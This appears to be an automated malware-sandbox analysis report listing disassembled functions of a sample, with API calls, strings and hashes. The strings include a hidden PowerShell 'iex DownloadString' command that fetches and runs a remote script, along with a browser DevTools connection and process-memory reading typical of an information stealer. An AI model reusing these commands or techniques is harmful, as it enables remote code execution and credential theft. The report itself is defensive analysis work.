                                                                                                                                                                                                                                                                                                  Function 004110A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %dx%d$DISPLAY
                                                                                                                                                                                                                                                                                                  • API String ID: 3940144428-3048177138
                                                                                                                                                                                                                                                                                                  • Opcode ID: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
                                                                                                                                                                                                                                                                                                  • Instruction ID: 594384e9460ea50e1c1a2799b2b5ef6833a83c8cc8fe28b05d57f5c36ffcb85d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F090713807047FF31027A5AC4EF2B7A5DEB84B56F110026BF06D72D2DAA56C1086F8
                                                                                                                                                                                                                                                                                                  Function 00406BC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 115stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404EA0: InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00002407), ref: 00406F38
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004053F0: strlen.MSVCRT ref: 00405409
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004053F0: memchr.MSVCRT ref: 00405456
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004053F0: memcmp.MSVCRT(00000000,?,00000000), ref: 0040546E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,77355E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00406C44
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000009,ws://localhost:9223,00000009,?,00002407), ref: 00406C58
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000009,00000000), ref: 00406C65
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$lstrcat$??3@InternetOpenmemchrmemcmpmemmovememsetstrlen
                                                                                                                                                                                                                                                                                                  • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                                  • API String ID: 2141826376-2676143373
                                                                                                                                                                                                                                                                                                  • Opcode ID: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                                  • Instruction ID: 91c73b424bc1f2f560fb80e69d34ff2093765c111021dba20f9d1d410260af79
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8731C9719002185BEB14AB65DC49BEFB775AF41308F41006EF506772C2DB7C1A85CBA9
                                                                                                                                                                                                                                                                                                  Function 00412400 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 00412560
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteShellSystemTimememset
                                                                                                                                                                                                                                                                                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 1675527290-38637897
                                                                                                                                                                                                                                                                                                  • Opcode ID: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                                  • Instruction ID: 334dd5afd32dd1eb1b8252b2cfcba07153a0a01eb84f6ed827c6dd8a75e550bd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04e0a849c7175668f7dfbabee4cdcea548fc796aeff486efc7e20cc012ef2f47
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6418A303103146BD654BB6299A6BAF7A595BC4758F40045E784B1F283CEBC5CC5C7EE
                                                                                                                                                                                                                                                                                                  Function 00411D20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
                                                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00411D8F
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411E21
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00411E3C
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411E4B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$Heap$AllocCloseHandleOpenTerminatewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                                                                  • API String ID: 2756667156-2783943728
                                                                                                                                                                                                                                                                                                  • Opcode ID: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5d8af7fbd58c0c14971e09abe29c4d5a15048916ed38c030ba04a2c092a42a15
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfd91a03897fc7cdf9307d1a4434efb42ed2110cc448090386432cb08c4c10e8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E731C130608341ABD3109F60ED48BAFB7E9EFD5744F00591EF985821A0EB7499C4CA5B
                                                                                                                                                                                                                                                                                                  Function 0040F9B0 Relevance: 10.8, APIs: 7, Instructions: 265stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F899
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F8D6
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00064000,00000000,?,?,00000000), ref: 0040FB5E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$MemoryProcessQueryReadVirtualmemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3741619940-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f3e5458c0cb4e82bdfb47d3dacbfc32efe29669a25e4631f25e2303d30cacff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c617cb530a7beb5f6651db65b09bd67427ed6a4aab75091136474a9db1aa80fd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0A159716083018BD328DF24D891A3BB7E2FF94704F14893EE58697791E738E849CB5A
                                                                                                                                                                                                                                                                                                  Function 004120F0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 239COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
